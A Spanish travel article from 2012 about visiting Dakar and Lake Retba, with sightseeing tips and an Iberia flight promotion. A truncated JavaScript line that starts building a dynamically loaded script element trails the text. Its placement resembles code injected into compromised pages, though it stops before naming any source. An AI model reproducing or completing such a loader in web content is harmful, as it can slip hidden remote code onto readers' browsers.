Baño en sal junto a Dakar

07/06/2012

Los viajeros enamorados de África lo saben: Dakar es una de las ciudades más hospitalarias y entretenidas del continente. ¿Dakar? Sí. Igual usted nunca se había planteado viajar hasta este rincón atlántico, pero la capital de Senegal mezcla sus raíces africanas con toques europeos. ¿No se lo cree? Basta una imagen desde el avión para comprobar la belleza de su bahía. Cuando uno pone los pies en la tierra y pasea por sus avenidas arboladas, los colores explotan en nuestra retina.

El centro neurálgico es la Plaza de la Independencia, en constante movimiento, y desde aquí se puede empezar la ruta. La catedral parece un pastel de merengue gigante, con sus dos torres y la gran bóveda. No hay que perderse el Museo Nacional y sus alrededores, donde se encuentra un teatro y numerosas embajadas. Otro museo, el Ifan, es visita obligada, ya que posee una importante colección de arte del oeste de África. Entre máscaras, estatuas e instrumentos musicales pasa el tiempo y habrá que tomar fotos del señorial Palacio Presidencial o del edificio de Correos, con una curiosa forma circular. Fuera del centro se ubica la Gran Mezquita, de estilo marroquí. Suba sin pensarlo al minarete (vamos: un, dos, un dos) y se quedará un rato contemplando las vistas de una urbe que engancha.

¿Una parada? En Dakar uno puede tomar un tentempié casi en cualquier esquina. Un lugar excepcional es la Avenida Pompidou, repleta de tiendas y cafés. Aunque para refrescarse nada mejor que las playas. La de los Niños está situada muy cerca del centro. Una de las más populares es la de Bel-Air, llamada como la exclusiva zona de Los Ángeles, y para ello habrá que seguir rumbo al norte desde la estación de tren. El zoo es un buen lugar para conocer la fauna de esta parte de África. Allí encontrará monos rojos, antílopes, chimpancés, hienas, chacales, panteras, guepardos… No se aburrirá. La noche de Dakar le sorprenderá por su cantidad de bares y espectáculos de danzas senegalesas.

Y si se queda con ganas de más naturaleza, tendrá que acercarse al Lago Retba, más conocido como Lago Rosa, pues el color de sus aguas varía desde el rojo pálido hasta el malva, según la intensidad del sol. Ojo, que en los días nublados no tiene ningún tono especial. Este lago está considerado como el Mar Muerto de Senegal por su elevadísima concentración de sal. De hecho, se pueden ver a cientos de personas extrayendo este mineral del fondo del lago. Usted fije la mirada en las dunas y en el agua. Dicen los lugareños que si uno se baña aquí, limpiará su cuerpo y su mente de impurezas. Habrá que hacerles caso.

Datos útiles:

  • Dakar tiene algo más de 1 millón de habitantes.
  • Senegal es un país seguro en general. En Dakar hay que tener cuidado con los carteristas.
  • La moneda es el franco CFA (XOF).
  • El idioma oficial es el francés. También más de 10 lenguas africanas, aunque la más extendida es el wolof.
  • Los viajeros deben vacunarse contra la fiebre amarilla y seguir un tratamiento antipaludismo.
  • Iberia ofrece vuelos directos a Dakar. Los mejores precios los encontrará en www.iberia.com marcando “soy flexible en fechas“. Para estar al día, le recomendamos las alertas BIP.

Foto | Jeff Attaway

var d=document;var s=d.createElement(‘script’);